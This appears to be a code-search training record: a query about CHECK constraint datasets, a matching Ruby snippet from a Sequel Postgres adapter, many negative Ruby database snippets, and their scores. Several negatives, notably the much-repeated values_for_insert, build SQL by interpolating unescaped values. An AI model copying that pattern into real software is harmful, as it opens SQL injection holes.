"def prepare(type, name=nil, *values)\n ps = to_prepared_statement(type, values)\n ps.extend(JDBC::Dataset::PreparedStatementMethods)\n ps.extend(::Sequel::Fdbsql::DatasetMethods::PreparedStatementMethods)\n if name\n ps.prepared_statement_name = name\n db.set_prepared_statement(name, ps)\n end\n ps\n end",
"def values_for_insert\r\n values = []\r\n self.class.column_names.each do |col_name|\r\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\r\n end\r\n values.join(\", \")\r\nend",
"def GetValueId(db, valueTable, idColumn, valueColumn, value)\n\tquery = db.execute(\"SELECT \" + idColumn + \" FROM \" + valueTable + \" WHERE \" + valueColumn + \" = ?;\",[value])\n\t\n\tif (query.length == 1)\n\t\treturn query\n\telse\n\t\tdb.execute(\"INSERT INTO \" + valueTable + \"(\" + valueColumn + \") VALUES (?);\", [value])\n\t\treturn db.execute(\"SELECT \" + idColumn + \" FROM \" + valueTable + \" WHERE \" + valueColumn + \" = ?;\",[value])\n\tend\nend",
"def single_value(sql, opts=OPTS)\n _execute(sql, opts){|conn| log_connection_yield(sql, conn){conn.first_value_from(sql)}}\n end",
"def update_sql(values = {}, opts = nil, &block)\n opts = opts ? @opts.merge(opts) : @opts\n\n if opts[:group]\n raise Error::InvalidOperation, \"A grouped dataset cannot be updated\"\n elsif (opts[:from].size > 1) or opts[:join]\n raise Error::InvalidOperation, \"A joined dataset cannot be updated\"\n end\n \n sql = \"UPDATE #{source_list(@opts[:from])} SET \"\n if block\n sql << block.to_sql(self, :comma_separated => true)\n else\n set = if values.is_a?(Hash)\n # get values from hash\n values = transform_save(values) if @transform\n values.map do |k, v|\n # convert string key into symbol\n k = k.to_sym if String === k\n \"#{literal(k)} = #{literal(v)}\"\n end.join(COMMA_SEPARATOR)\n else\n # copy values verbatim\n values\n end\n sql << set\n end\n if where = opts[:where]\n sql << \" WHERE #{literal(where)}\"\n end\n\n sql\n end",
"def build_insert_stmt(dynamo_field_value)\n values = []\n insert_stmt_fields = DynamoFieldValue.column_names.reject{ |field| field == 'id'}\n insert_stmt_fields.each do |field_name|\n # We need to tinker with fields based on their type for sql syntax purposes\n temp_val = dynamo_field_value.send(field_name)\n temp_val = \"'#{temp_val}'\" if temp_val.class.to_s == \"String\" || temp_val.class.to_s == \"ActiveSupport::TimeWithZone\"\n temp_val = \"NULL\" if temp_val.nil?\n values << temp_val\n end\n \"(#{values.join(',')})\"\n end",
"def get_data sql\n #$log.debug \"SQL: #{sql} \"\n columns, *rows = @db.execute2(sql)\n #$log.debug \"XXX COLUMNS #{sql}, #{rows.count} \"\n content = rows\n return content\n end",
"def _insert_select_raw(ds)\n if use_prepared_statements_for?(:insert_select)\n if ps = model.send(:prepared_insert_select, @values.keys)\n _set_prepared_statement_server(ps).call(@values)\n end\n else\n super\n end\n end",
"def select_sql\n return super unless o = @opts[:offset]\n l = @opts[:limit]\n order = @opts[:order]\n dsa1 = dataset_alias(1)\n dsa2 = dataset_alias(2)\n rn = row_number_column\n irn = Sequel::SQL::Identifier.new(rn).qualify(dsa2)\n subselect_sql(unlimited.\n from_self(:alias=>dsa1).\n select_more(Sequel::SQL::QualifiedIdentifier.new(dsa1, WILDCARD),\n Sequel::SQL::WindowFunction.new(SQL::Function.new(:ROW_NUMBER), Sequel::SQL::Window.new(:order=>order)).as(rn)).\n from_self(:alias=>dsa2).\n select(Sequel::SQL::QualifiedIdentifier.new(dsa2, WILDCARD)).\n where(l ? ((irn > o) & (irn <= l + o)) : (irn > o))) # Leave off limit in case of limit(nil, offset)\n end",
"def select_sql\n return super unless l = @opts[:limit]\n o = @opts[:offset] || 0\n order = @opts[:order]\n dsa1 = dataset_alias(1)\n dsa2 = dataset_alias(2)\n rn = row_number_column\n irn = Sequel::SQL::Identifier.new(rn).qualify(dsa2)\n subselect_sql(unlimited.\n from_self(:alias=>dsa1).\n select_more(Sequel::SQL::QualifiedIdentifier.new(dsa1, WILDCARD),\n Sequel::SQL::WindowFunction.new(SQL::Function.new(:ROW_NUMBER), Sequel::SQL::Window.new(:order=>order)).as(rn)).\n from_self(:alias=>dsa2).\n select(Sequel::SQL::QualifiedIdentifier.new(dsa2, WILDCARD)).\n where((irn > o) & (irn <= l + o)))\n end",
"def values value_type = :formatted_value\n return @values unless @values.nil?\n\n @values = []\n while @rowset.next do\n @values << 1.upto(self.columns.size).map do |i|\n @rowset.getString i\n end\n end\n\n @values\n end",
"def getDBValue(connection, query, id1, *id2)\r\n dbi_query = connection.prepare(query)\r\n dbi_query.execute(id1, *id2)\r\n #fetch the result\r\n return dbi_query.fetch\r\nend",
"def prepared_insert(cols)\n cached_prepared_statement(:insert, prepared_columns(cols)){prepare_statement(dataset, :insert, prepared_statement_key_hash(cols))}\n end",
"def create(values)\n a = new(values)\n a.insert\n a\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\nend",
"def execute2( sql, *bind_vars )\n stmt = prepare( sql )\n stmt.bind_params( *bind_vars )\n stmt.execute do |result|\n if block_given?\n yield result.columns\n result.each { |row| yield row }\n else\n return result.inject( [ result.columns ] ) { |arr,row| arr << row; arr }\n end\n end\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def compound_dataset_sql_append(sql, ds)\n sql << '('\n super\n sql << ')'\n end",
"def value_list(arg)\n raise Error, 'argument to Sequel.value_list must be an array' unless arg.is_a?(Array)\n SQL::ValueList.new(arg)\n end",
"def add_values_rec(schema, table, t, query)\n if t.parent == nil\n t.data['values'] = exec(query)\n else\n t.parent.data['values'].each_with_index { |v, i|\n where = \"WHERE\"\n unless t.parent.foreign_keys.size == 0\n t.parent.foreign_keys.each { |x|\n if x['foreign_table_name'] == t.table_name\n foreign_col = x['foreign_column_name']\n col = x['column_name']\n parent_val = t.parent.data['values'][i][col]\n where = \"#{where} #{foreign_col} = '#{parent_val}'\"\n end\n }\n end\n query = \"SELECT * FROM #{schema}.#{table} #{where} LIMIT 1\";\n if t.data['values'].nil?\n t.data['values'] = Array.new\n end\n t.data['values'] << exec(query)[0]\n }\n end\n\n t.depends.each { |n|\n add_values_rec(schema, n.table_name, n, query)\n }\nend",
"def update_sql(values=OPTS)\n case values\n when LiteralString\n super\n when String\n super(LiteralString.new(values))\n else\n super\n end\n end",
"def merge_insert(*values, &block)\n h = {:type=>:insert, :values=>values}\n if override = @opts[:override]\n h[:override] = insert_override_sql(String.new)\n end\n _merge_when(h, &block)\n end",
"def insert_by_data data, table\n sql = \"insert into #{table} \"\n case data\n when Array\n data.each do |d|\n insert_by_data(d, table)\n end\n when Hash\n columns = data.keys.to_s.gsub('[','(').gsub(']',')').gsub('\"','')\n values = data.values.to_s.gsub('[','(').gsub(']',')').gsub('nil','NULL')\n sql = sql + columns + \" values \" + values\n query(sql)\n end\n end",
"def _insert_select_raw(ds)\n ds.insert_select(_insert_values)\n end",
"def _insert_select_raw(ds)\n ds.insert_select(_insert_values)\n end",
"def to_sql(options = {})\n sql = \"SET #{variable.to_sql(options)}\"\n sql << \" TO #{value.to_sql(options)}\"\n sql\n end",
"def prepared_sql\n case prepared_type\n when :select, :all, :each\n # Most common scenario, so listed first.\n select_sql\n when :first\n clone(:limit=>1).select_sql\n when :insert_select\n insert_select_sql(*prepared_modify_values)\n when :insert, :insert_pk\n insert_sql(*prepared_modify_values)\n when :update\n update_sql(*prepared_modify_values)\n when :delete\n delete_sql\n else\n select_sql\n end\n end",
"def sql_literal_append(ds, sql)\n sql << 'ROW'\n ds.literal_append(sql, to_a)\n if db_type\n sql << '::'\n ds.quote_schema_table_append(sql, db_type)\n end\n end"
] |
[
"0.6753085",
"0.62763065",
"0.6110033",
"0.60504055",
"0.60172516",
"0.6014192",
"0.6014192",
"0.6014192",
"0.59369415",
"0.59227353",
"0.5892935",
"0.5834878",
"0.5817698",
"0.58152235",
"0.57881755",
"0.57512873",
"0.5743603",
"0.56180286",
"0.56150466",
"0.5567219",
"0.55650127",
"0.5553461",
"0.5533461",
"0.5527519",
"0.55056405",
"0.54960066",
"0.54938126",
"0.5485569",
"0.54644233",
"0.5447037",
"0.54394484",
"0.5429797",
"0.541834",
"0.5418245",
"0.540766",
"0.53971833",
"0.5383632",
"0.5346307",
"0.53317356",
"0.53302777",
"0.53206563",
"0.5280352",
"0.52710575",
"0.52602595",
"0.5260173",
"0.52579457",
"0.5251952",
"0.52511376",
"0.52370524",
"0.5227489",
"0.52156657",
"0.52087873",
"0.52086884",
"0.5207923",
"0.5203451",
"0.5189627",
"0.5158768",
"0.51400995",
"0.51400995",
"0.51288205",
"0.51002073",
"0.50877833",
"0.5082867",
"0.50802845",
"0.507322",
"0.50672406",
"0.50647306",
"0.50642806",
"0.50601214",
"0.50541866",
"0.50522757",
"0.5042895",
"0.50357985",
"0.5022594",
"0.5022019",
"0.50089246",
"0.50061285",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.49851337",
"0.49770308",
"0.49716088",
"0.49702686",
"0.4964581",
"0.49619704",
"0.4956249",
"0.4956249",
"0.49449632",
"0.49436006",
"0.49421656"
] |
0.5404321
|
35
|
Array of symbols specifying view names in the current database. Options: :materialized :: Return materialized views :qualify :: Return the views as Sequel::SQL::QualifiedIdentifier instances, using the schema the view is located in as the qualifier. :schema :: The schema to search :server :: The server to use
|
def views(opts=OPTS)
relkind = opts[:materialized] ? 'm' : 'v'
pg_class_relname(relkind, opts)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def views(name = nil)\n select_values(\"SELECT table_name FROM information_schema.views\", name)\n end",
"def get_views\n connect_db.fetch(\"SELECT RDB$RELATION_NAME, RDB$VIEW_SOURCE FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NOT NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)\")\n end",
"def view_names\n self['views'].keys\n end",
"def create_view_prefix_sql(name, options)\n sql = create_view_sql_append_columns(\"CREATE #{'OR REPLACE 'if options[:replace]}#{'TEMPORARY 'if options[:temp]}#{'RECURSIVE ' if options[:recursive]}#{'MATERIALIZED ' if options[:materialized]}VIEW #{quote_schema_table(name)}\", options[:columns] || options[:recursive])\n\n if options[:security_invoker]\n sql += \" WITH (security_invoker)\"\n end\n\n if tablespace = options[:tablespace]\n sql += \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n sql\n end",
"def views(opts=OPTS, &block)\n tables_or_views('VIEW', opts, &block)\n end",
"def quote_table_or_view(name, options)\n schema = options[:schema]\n if schema\n \"\\\"#{schema}\\\".\\\"#{name}\\\"\"\n else\n \"\\\"#{name}\\\"\"\n end\n end",
"def views\n Views.new(connection).all\n end",
"def create_view_prefix_sql(name, options)\n create_view_sql_append_columns(\"CREATE #{'OR REPLACE 'if options[:replace]}VIEW #{quote_schema_table(name)}\", options[:columns])\n end",
"def materialized_views(name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; [] end",
"def do_query_view(view_name, view_options)\n database.view \"#{self.name.underscore}/#{view_name}\", view_options\n end",
"def views(stream)\n # Don't create \"system\" views.\n view_names = PgSaurus::Tools.views\n view_names.each do |options|\n write_view_definition(stream,\n options[\"table_schema\"],\n options[\"table_name\"],\n options[\"view_definition\"])\n end\n stream << \"\\n\"\n end",
"def get_views()\n gen_config.views.map(&:name)\n end",
"def view_names\n expr.split %r{[()]}\n end",
"def all\n views_from_mysql.map(&method(:to_scenic_view))\n end",
"def view_select_statement(view, name=nil)\n row = execute(\"SELECT VIEW_DEFINITION FROM SYSIBM.VIEWS WHERE TABLE_NAME = '#{view}'\", name).each do |row|\n return row[0]\n end\n raise \"No view called #{view} found\"\n end",
"def view(name)\n new_view = view_old(name)\n new_view.table_name = name\n new_view\n end",
"def get_schema schema_name, view, options = {}\n schema_view = Google::Cloud::PubSub::V1::SchemaView.const_get view.to_s.upcase\n schemas.get_schema name: schema_path(schema_name, options),\n view: schema_view\n end",
"def view(options = {})\n\t \tget_records('-view', {}, options)\n\t end",
"def view(ddoc,view,*opts)\n q = \"#{database}/_design/#{ddoc}/_view/#{view}\"\n q << build_query_string(opts.first,\"view\") if opts && opts.any? && opts.first.is_a?(Hash)\n\n @conn.query({url_path: q, method: :get})\n end",
"def views\n @views ||= Ken::Collection.new(types.map { |type| Ken::View.new(self, type) })\n end",
"def gen_view_uri(opts={})\n uri = format(\"/%s/_all_docs\", @dbname)\n \n msg = { \"uri\" => uri } and $stderr.puts msg.to_json if @debug\n \n return gen_uri_with_options(uri, opts)\n end",
"def scaffold_views\n #%w(list show new edit)\n %w(list show)\n end",
"def view_select_statement(view, name=nil)\n q =<<-ENDSQL\n SELECT\n SM.definition\n FROM\n sys.objects O\n JOIN\n sys.sql_modules SM ON o.object_id = SM.object_id\n WHERE\n o.type = 'V' AND o.name = '#{view}'\n ENDSQL\n \n view_def = select_value(q, name)\n \n if view_def\n return convert_statement(view_def)\n else\n raise \"No view called #{view} found\"\n end\n end",
"def create_view_sql(name, source, options)\n source = source.sql if source.is_a?(Dataset)\n sql = String.new\n sql << \"#{create_view_prefix_sql(name, options)} AS #{source}\"\n if check = options[:check]\n sql << \" WITH#{' LOCAL' if check == :local} CHECK OPTION\"\n end\n sql\n end",
"def available_views\n %w(index new edit show _list _form)\n end",
"def drop_view(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS\n names.each do |n|\n execute_ddl(drop_view_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def view_types(for_select = true) # get the defined view type partials. e.g. views/views/list.html.erb\n fetch_array_for get_view_types, for_select\n end",
"def get_view_name(search_fields, prefix = \"find\")\n prefix + \"_by_\" + search_fields.join('_and_')\n end",
"def list_schemas view, options = {}\n schema_view = Google::Cloud::PubSub::V1::SchemaView.const_get view.to_s.upcase\n paged_enum = schemas.list_schemas parent: project_path(options),\n view: schema_view,\n page_size: options[:max],\n page_token: options[:token]\n\n paged_enum.response\n end",
"def views(name = nil)\n raise NotImplementedError, \"views is an abstract method\"\n end",
"def view_query(design_document_name, view_name, options = Options::View::DEFAULT)\n resp = @backend.document_view(@name, design_document_name, view_name, options.namespace, options.to_backend)\n ViewResult.new do |res|\n res.meta_data = ViewMetaData.new do |meta|\n meta.total_rows = resp[:meta][:total_rows]\n meta.debug_info = resp[:meta][:debug_info]\n end\n res.rows = resp[:rows].map do |entry|\n ViewRow.new do |row|\n row.id = entry[:id] if entry.key?(:id)\n row.key = JSON.parse(entry[:key])\n row.value = JSON.parse(entry[:value])\n end\n end\n end\n end",
"def viewize(functions)\n {:views => functions}\n end",
"def tables\n db_connection.select_values(\"show tables\")\n end",
"def document_index_view_types\n vals = configuration.document_index_view_types\n Blacklight::OpenStructWithHashAccess.new.tap do |s|\n view_type_options.each do |k|\n s[k] = vals.include?(k.to_s)\n end\n end\n end",
"def alter_materialized_view_schema(name, schema, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_schema => schema\n }, options).to_sql\n end",
"def materialized_view_definition(matview_name, name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; end",
"def views\n []\n end",
"def views\n []\n end",
"def views\n []\n end",
"def views\n []\n end",
"def refresh_views\n database.views.each do |name, view|\n materialize(view)\n end\n end",
"def view_path(design, view, query_options=nil)\n design_fullname = get_design_fullname(design)\n view_options = {}\n if query_options\n # convert query args to json value\n [:key, :startkey, :endkey].each do |arg|\n view_options[arg] = query_options[arg].to_json if query_options.has_key?(arg)\n end\n\n # do not care\n [:include_docs, :update, :descending, :group, :startkey_docid, :endkey_docid, :count, :skip, :group_level].each do |arg|\n view_options[arg] = query_options[arg] if query_options.has_key?(arg)\n end\n end\n document_path(File.join(\"_view\", design_fullname, view.to_s), view_options)\n end",
"def refresh_view(name, opts=OPTS)\n run \"REFRESH MATERIALIZED VIEW#{' CONCURRENTLY' if opts[:concurrently]} #{quote_schema_table(name)}\"\n end",
"def tables view: nil\n client.list_tables(\n instance_path,\n view: view\n )\n end",
"def update_view name, type, columns, options={}\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n raise ViewNotExistException(\"View #{name} does not exist in current db\") unless view_structure\n \n columns_str = columns.is_a?(Array) ? columns.join(',') : columns\n \n select_pattern = /select (.*) from/i\n select_str = view_structure[select_pattern,1]\n\n case type\n when :add\n view_structure.gsub!(select_pattern, \"SELECT #{select_str}, #{columns_str} FROM\")\n when :remove\n select_str.gsub!(\", #{columns_str}\", '')\n view_structure.gsub!(select_pattern, \"SELECT #{select_str} FROM\")\n when :replace\n view_structure.gsub!(select_pattern, \"SELECT #{columns_str} FROM\")\n end\n\n drop_views name, options[:dependent_views] \n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end",
"def views()\n return uri(\"api/views/\")\n end",
"def tables(name = nil)\n select_rows(<<-SQL, name).map { |row| row[0] }\nSELECT name\nFROM sysobjects\nWHERE type = 'U'\nSQL\n end",
"def recreate_view name\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n if view_structure\n execute \"DROP VIEW IF EXISTS #{name}\"\n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end\n end",
"def show_tables\n execute('select table_name from information_schema.tables where table_schema = ?', [schema])\n end",
"def schemas\n sql = \"SELECT nspname FROM pg_namespace WHERE nspname !~ '^pg_.*'\"\n ActiveRecord::Base.connection.query(sql).flatten\n end",
"def alter_materialized_view_set_options(name, set_options, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_options => set_options\n }, options).to_sql\n end",
"def refresh_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::RefreshView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n sql = \"REFRESH MATERIALIZED VIEW #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def tables(name = nil)\n query(<<-SQL, name).map { |row| row[0] }\n SELECT table_name\n FROM v_catalog.tables\n WHERE table_schema = 'public'\n SQL\n end",
"def schema_names\n select_value(<<-SQL, 'SCHEMA')\n SELECT nspname\n FROM pg_namespace\n WHERE nspname !~ '^pg_.*'\n AND nspname NOT IN ('information_schema')\n ORDER by nspname;\n SQL\n end",
"def get_storage_names\n select(<<-SQL.compress_lines)\n SELECT name\n FROM (SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_temp_master)\n WHERE type IN('table', 'view')\n AND name NOT LIKE 'sqlite_%'\n ORDER BY name\n SQL\n end",
"def current_schemata\n extension :pg_array\n metadata_dataset.select(Sequel::function(:current_schemas, false).\n cast('varchar[]')).single_value.map(&:to_sym)\n end",
"def index\n @schemas = Schema.all\n end",
"def paths_to_view view\n replaceable_paths_to :views, \"#{view}.*\"\n end",
"def path_to_views\n @path_to_views ||= \"db/views\"\n end",
"def default_views(field_op_set)\n views = {}\n field_op_set.each do |field, op_id|\n view_name = \"by_#{field.to_s}\"\n type_of_view = OpIdToViewType[op_id] || :value_match\n views[view_name] = {:field => field.to_sym, :type_of_view => type_of_view}\n end\n views\n end",
"def enclosure_views\n client.enumerate(\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/root/DCIM/DCIM_EnclosureView\")\n end",
"def sorted_view_dependencies\n view_dep = Viewy::Models::MaterializedViewDependency.find(full_table_name)\n Viewy::DependencyManagement::ViewSorter.new.sorted_materialized_view_subset(view_names: view_dep.view_dependencies)\n end",
"def view_select_statement(view, name=nil)\n raise NotImplementedError, \"view_select_statement is an abstract method\"\n end",
"def tenant_names\n connection.execute('select datname from pg_database;').collect { |row| row['datname'] }\n end",
"def database_names\n database_info.keys\n end",
"def view_paths\n _view_paths\n end",
"def view_paths\n _view_paths\n end",
"def schema_names\n select_values(\n \"SELECT nspname FROM pg_namespace\" <<\n \" WHERE nspname !~ '^pg_.*' AND nspname NOT IN ('information_schema')\" <<\n \" ORDER by nspname;\",\n 'SCHEMA')\n end",
"def views\n self[:views] ||= Gnash.new\n end",
"def database_names\n database_info.keys\n end",
"def get_storage_names\n # This gets all the non view tables, but has to strip column 0 out of the two column response.\n select(\"SHOW FULL TABLES FROM #{options[:path][1..-1]} WHERE Table_type = 'BASE TABLE'\").map { |item| item.first }\n end",
"def all opts = {}\n self.generated_design_doc ||= default_design_doc\n unless design_doc_fresh\n refresh_design_doc\n end\n view_name = \"#{design_doc_slug}/all\"\n raw = opts.delete(:raw)\n fetch_view_with_docs(view_name, opts, raw)\n end",
"def views\n @views\n end",
"def aliases!\n @schema.aliases!\n end",
"def cd_id_table\n view_name = cd_id_table_tn\n if @cd_id_table_tn_exists.nil?\n @cd_id_table_tn_exists=true\n if !$db.table_exists?(view_name)\n $db.run(\"CREATE VIEW #{view_name} AS SELECT DISTINCT(r.canonical_document_id) FROM records r INNER JOIN records_searches br ON r.id=br.record_id INNER JOIN searches b ON br.search_id=b.id WHERE b.systematic_review_id=#{self[:id]} AND b.valid=1\n\n UNION\n\n SELECT DISTINCT r.canonical_document_id FROM searches b INNER JOIN records_searches br ON b.id=br.search_id INNER JOIN records_references rr ON br.record_id=rr.record_id INNER JOIN bib_references r ON rr.reference_id=r.id WHERE b.systematic_review_id=#{self[:id]} and r.canonical_document_id IS NOT NULL and b.valid=1 GROUP BY r.canonical_document_id\")\n end\n end\n $db[view_name.to_sym]\n end",
"def get_view_columns\n if @_view_columns.nil?\n set_default_view_columns\n end\n @_view_columns\n end",
"def origin_views\n if pq = self.parent_rmq\n pq.selected\n else\n [self.weak_view_controller.view]\n end\n end",
"def view name, query={}, &block\n unless design_doc_fresh\n refresh_design_doc\n end\n query[:raw] = true if query[:reduce] \n raw = query.delete(:raw)\n view_name = \"#{design_doc_slug}/#{name}\"\n fetch_view_with_docs(view_name, query, raw, &block)\n end",
"def show_view_option\n uri = Addressable::URI.parse(request.fullpath.split(\"?\")[0] + \"?\" + generate_next_url)\n newUri = uri.query_values\n if newUri['view'].present?\n view_option = newUri['view'].to_s\n else\n view_option = \"detailed\"\n end\n return view_option\n end",
"def view_database\n table_html = '<a href=\"/admin\"> << back to index</a>'\n table_names = ActiveRecord::Base.connection.tables.delete_if { |x| x == 'schema_migrations' }\n table_names.sort.each do |name|\n table_name = \"#{name.titleize.gsub(' ', '').singularize}\"\n table_data = eval(\"#{table_name}.all\")\n\n table_html << \"<h2 style='border-bottom: solid;background-color: lightBlue;'>#{table_name}<a href='/admin/delete_db_view_data/#{table_name}' class='btn btn-large btn-primary' style='float:right'>Delete All</a></h2>\"\n table_data.each do |row|\n table_html << \"<ul style='border: 3px dotted'>\"\n row.attributes.each do |column_name, column_data|\n table_html << \"<li>#{column_name} : #{column_data}</li>\"\n end\n table_html << \"<li><a href='/admin/delete_db_view_record/#{table_name}_#{row.id}' class='btn btn-large btn-primary' style='font-size:20px;'>[Delete Record]</a></li></ul>\"\n end\n\n end\n render :text => table_html\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def table_or_view\n return unless Admin::MigrationGenerator.table_or_view_exists? table_name\n\n return :table if Admin::MigrationGenerator.table_exists? table_name\n\n :view\n end",
"def schema\n adapter.schema\n end",
"def reload! view: nil\n view ||= :SCHEMA_VIEW\n @grpc = service.get_table instance_id, name, view: view\n @loaded_views = Set[view]\n self\n end",
"def each_materialized_view(&block)\n if block_given?\n @views.each_value do |v|\n yield(v) if v.base_table\n end\n self\n else\n result = []\n @views.each_value do |v|\n result << v if v.base_table\n end\n result\n end\n end",
"def answers_by_views(options={})\n parse_answers(request(singular(id) + \"answers/views\", options))\n end",
"def fc_views\n client.enumerate(\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/root/DCIM/DCIM_FCView\")\n end",
"def tables(name = nil)\n query(<<-SQL, 'SCHEMA').map { |row| row[0] }\n SELECT tablename\n FROM pg_tables\n WHERE schemaname = ANY (ARRAY['public'])\n SQL\n end",
"def matching_records_arel(table_name)\n s = Arel::Table.new(\"#{table_name}_view\")\n arel_columns = column_names.map{ |c| Arel::Attribute.new(s, c) }\n Trade::SandboxTemplate.select('*').from(\"#{table_name}_view\").where(\n arel_columns.shift.eq(arel_columns.shift)\n )\n end",
"def columns\n [\"#{@base}.*\"]\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def view_paths; end",
"def view_paths; end",
"def view_paths; end",
"def document_index_view_type query_params=params\n view_param = query_params[:view]\n view_param ||= session[:preferred_view]\n if view_param and document_index_views.keys.include? view_param.to_sym\n view_param.to_sym\n else\n default_document_index_view_type\n end\n end",
"def build_view_paths(paths); end",
"def generate_views\n target_views = VIEWS\n file_prefix = prefix.blank? ? '' : prefix.singularize.underscore + '_'\n target_views.each do |name|\n directory name, \"app/views/#{file_prefix}#{name}\"\n end\n end",
"def databases\n arrayCommand( \"show db\", DictItemArray, RESPONSE_DATABASES_FOLLOW, RESPONSE_NO_DATABASES )\n end",
"def databases\n arrayCommand( \"show db\", DictItemArray, RESPONSE_DATABASES_FOLLOW, RESPONSE_NO_DATABASES )\n end",
"def virtual_disk_views\n client.enumerate(\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/root/DCIM/DCIM_VirtualDiskView\")\n end"
] |
[
"0.7103677",
"0.66371846",
"0.62148297",
"0.6162572",
"0.6033561",
"0.5926373",
"0.58784133",
"0.5872362",
"0.5858072",
"0.5778937",
"0.5770808",
"0.5722647",
"0.57035476",
"0.563731",
"0.55852634",
"0.55369884",
"0.5510381",
"0.5483866",
"0.5450678",
"0.54368955",
"0.53736657",
"0.5353874",
"0.5308461",
"0.52991337",
"0.5287953",
"0.52876735",
"0.52307326",
"0.522717",
"0.5204715",
"0.5194895",
"0.5192026",
"0.51676327",
"0.51561075",
"0.5129841",
"0.50958693",
"0.50958073",
"0.50867826",
"0.50867826",
"0.50867826",
"0.50867826",
"0.50781155",
"0.50778985",
"0.50714874",
"0.50608695",
"0.5014421",
"0.5011652",
"0.5008729",
"0.4999395",
"0.499787",
"0.4997494",
"0.4995671",
"0.49663284",
"0.49661928",
"0.495338",
"0.4939049",
"0.49345922",
"0.49236077",
"0.4885357",
"0.48774084",
"0.48707393",
"0.4867834",
"0.48670554",
"0.48667544",
"0.48621103",
"0.48620424",
"0.4858019",
"0.4858019",
"0.48536432",
"0.4838073",
"0.48330322",
"0.48323327",
"0.48291662",
"0.48142785",
"0.48040748",
"0.48012933",
"0.47981346",
"0.47921526",
"0.4787439",
"0.47860867",
"0.47807136",
"0.4776236",
"0.4762209",
"0.47551557",
"0.4752621",
"0.47472063",
"0.4739198",
"0.4728582",
"0.4715916",
"0.47151908",
"0.47130036",
"0.4705808",
"0.47046772",
"0.47046772",
"0.47046772",
"0.47033265",
"0.46990284",
"0.46957588",
"0.46948242",
"0.46948242",
"0.46945208"
] |
0.69248116
|
1
|
Dataset used to retrieve CHECK constraint information
|
def _check_constraints_ds
@_check_constraints_ds ||= metadata_dataset.
from{pg_constraint.as(:co)}.
left_join(Sequel[:pg_attribute].as(:att), :attrelid=>:conrelid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).
where(:contype=>'c').
select{[co[:conname].as(:constraint), att[:attname].as(:column), pg_get_constraintdef(co[:oid]).as(:definition)]}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
